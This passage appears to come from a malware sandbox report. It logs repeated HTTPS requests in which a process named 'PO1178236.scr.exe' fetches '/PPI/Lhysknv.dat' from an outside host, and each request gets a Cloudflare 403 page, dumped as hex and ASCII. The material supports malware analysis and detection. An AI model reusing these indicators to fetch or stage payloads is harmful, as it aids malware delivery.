        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:45 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cb4qUUZrcytXe%2Fia%2F9U6Zf6s1ytT87DyuqN6UyobWiC0J8WUWFjb9%2B%2B6stQQOFHr%2BTIcvJ3YrFMsH4OMdZTkHE5mi4y07cp6Y2AxQrrIBgza%2BTn68KkIBHILMD6p4ZwOVlh1Y26I3Hy6tsEL"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1b5edc68c6c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=1992&rtt_var=781&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1465863&cwnd=168&unsent_bytes=0&cid=5806be8d7b03f785&ts=151&x=0"
        2025-01-09 07:36:30 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:30 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:30 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:30 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 62 35 65 64 63 36 38 63 36 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1b5edc68c6c</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:30 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 62 35 65 64 63 36 38 63 36 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1b5edc68c6c',t:'MTczNjQwODE5MC4wMDAwMDA='}
        2025-01-09 07:36:30 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        55192.168.2.949763188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:30 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:31 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:31 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:46 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5oXetgOG%2FA0FxhMx%2B3LyfonEULRw%2Breum2fmHB16EDKzxroj3PlQE7HTTHg9J17%2BzRN0V7FFHKWtMWStgjibBCVBKh8%2F6Xj%2BSPi050w%2FOOPUMnvUG3hFgjwqLOUfjmXSljJK3dCJjMZQtda"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1b9bbe10f47-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1467&rtt_var=570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1888745&cwnd=226&unsent_bytes=0&cid=def017bf4562dd44&ts=143&x=0"
        2025-01-09 07:36:31 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:31 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:31 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:31 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 62 39 62 62 65 31 30 66 34 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1b9bbe10f47</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:31 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 62 39 62 62 65 31 30 66 34 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4d 53 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1b9bbe10f47',t:'MTczNjQwODE5MS4wMDAwMDA=
        2025-01-09 07:36:31 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        56192.168.2.949764188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:31 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:31 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:31 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:46 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kWQzCs2OqYvFfCYbyLrMzka5pBhx9qHMO0u%2FXJyBwoWe2uckhhXuia9u%2BgL0WgNq9s%2FJq0hQ89ShhVnTRf8RUUdabJSjR500EbnzxHwDYtDzjPE1LR8uZ3aiaAGIBJZryVmXkcbOXPx3P9Ig"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1bd7bcf1a2c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1986&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1414728&cwnd=174&unsent_bytes=0&cid=0ff1f16783a8c1cc&ts=123&x=0"
        2025-01-09 07:36:31 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:31 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:31 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:31 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 62 64 37 62 63 66 31 61 32 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1bd7bcf1a2c</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:31 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 62 64 37 62 63 66 31 61 32 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1bd7bcf1a2c',t:'MTczNjQwODE5MS4wMDAwMDA='};var a
        2025-01-09 07:36:31 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        57192.168.2.949765188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:32 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:32 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:32 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:47 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FZlPZWGQavYyFfwwfq7plZtu8JByrqRAptXZg8XovJFv7PKlfgSKHzvDUeKKnGvXj6tyAoRb0HdWrxM3CkrkttY87uMBNnHhkKjUn9xXYAjJfB%2BwCS2m38ikFNcHRPW%2BVGx8HUJ5ANnAMqX"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1c15d537cee-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1951&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1496668&cwnd=176&unsent_bytes=0&cid=eeea8ab5be1630c9&ts=134&x=0"
        2025-01-09 07:36:32 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 